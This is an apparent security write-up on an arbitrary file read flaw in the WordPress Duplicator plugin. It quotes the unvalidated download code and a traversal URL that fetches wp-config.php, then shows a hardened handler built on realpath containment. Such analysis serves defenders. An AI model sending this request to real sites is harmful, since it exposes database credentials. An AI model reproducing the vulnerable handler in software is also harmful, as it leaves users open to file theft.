Analysis of vulnerability
In version 0.3.0 of the WordPress Duplicator plugin, the files /files/installer.rescue.php and /files/installer.template.php were added for security reasons. Their purpose is to let the user download an installer file. Both start with this snippet of code:
```php
//DOWNLOAD ONLY:
if ( isset($_GET['get'])) {
    $file = $_GET['file'];   // taken directly from the query string, never validated
    if (file_exists($file)) {
        header('Content-Description: File Transfer');
        header('Content-Type: application/octet-stream');
        header('Content-Disposition: attachment; filename=installer.php');
        header('Content-Transfer-Encoding: binary');
        header('Expires: 0');
        header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
        header('Pragma: public');
        header('Content-Length: ' . filesize($file));
        ob_clean();
        @flush();
        // whatever path was supplied is streamed back to the client as installer.php
        if (@readfile($file) == false) {
            $data = file_get_contents($file);
            if ($data == false) {
                die("Unable to read installer file. The server currently has readfile and file_get_contents disabled on this server. Please contact your server admin to remove this restriction");
            } else {
                print $data;
            }
        }
        exit;
    }
}
```
If the "get" query-string parameter is set, the script reads the file named by the "file" query-string parameter and writes its contents into the response as installer.php. Because this file is deployed by default to every installation and the "file" value is not sanitized or restricted to a directory, it can be used to read any arbitrary file the web server can access, with a request like this:
```
http://192.168.80.130/wordpress/wp-content/plugins/duplicator/files/installer.rescue.php?get=&file=../../../../wp-config.php
```
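For contrast, here is a hardened version of the same download handler. This is an added example, not code from the Duplicator plugin: it keeps the same "get"/"file" interface but only serves files whose resolved path lies inside a fixed directory, so the traversal request above is rejected. The directory name `files` under `__DIR__` and the helper `resolve_download_path()` are assumptions for the illustration.

```php
<?php
// Added example (not the plugin's own code): a hardened variant of the
// Duplicator download handler. The directory below is an assumption; in a
// real deployment it would be the plugin's own installer directory.
$allowedDir = realpath(__DIR__ . '/files');

/**
 * Map an untrusted "file" parameter to a path inside $allowedDir, or return
 * null if the request must be refused.
 */
function resolve_download_path($allowedDir, $requested)
{
    // Only a bare filename is accepted: basename() strips every directory
    // component, so "../../../../wp-config.php" collapses to "wp-config.php".
    $name = basename((string) $requested);
    if ($name === '' || $name === '.' || $name === '..') {
        return null;
    }

    // realpath() returns false for missing files and resolves symlinks and
    // "..", so the result is the actual on-disk location.
    $candidate = realpath($allowedDir . DIRECTORY_SEPARATOR . $name);
    if ($candidate === false) {
        return null;
    }

    // Final containment check: the resolved path must start with the
    // allowed directory plus a separator (this also defeats symlinks that
    // point outside the directory).
    if (strpos($candidate, $allowedDir . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }

    return $candidate;
}

if ($allowedDir !== false && isset($_GET['get'])) {
    $path = resolve_download_path($allowedDir, $_GET['file'] ?? '');
    if ($path === null) {
        // Refuse anything outside the directory; do not echo the requested
        // name back, which would leak what was probed for.
        http_response_code(404);
        exit;
    }

    header('Content-Description: File Transfer');
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename=installer.php');
    header('Content-Length: ' . filesize($path));
    readfile($path);
    exit;
}
```

Two design points are worth noting. `file_exists()` on its own, as in the original, is not a security check: it happily confirms that `../../../../wp-config.php` exists. The containment test has to be done on the path after `realpath()` has resolved it, because a check on the raw string can be bypassed with `..` segments or symlinks. Independently of path validation, an endpoint that hands out installer files should not be reachable anonymously; inside WordPress it would normally sit behind a capability check such as `current_user_can('manage_options')` rather than being a standalone script.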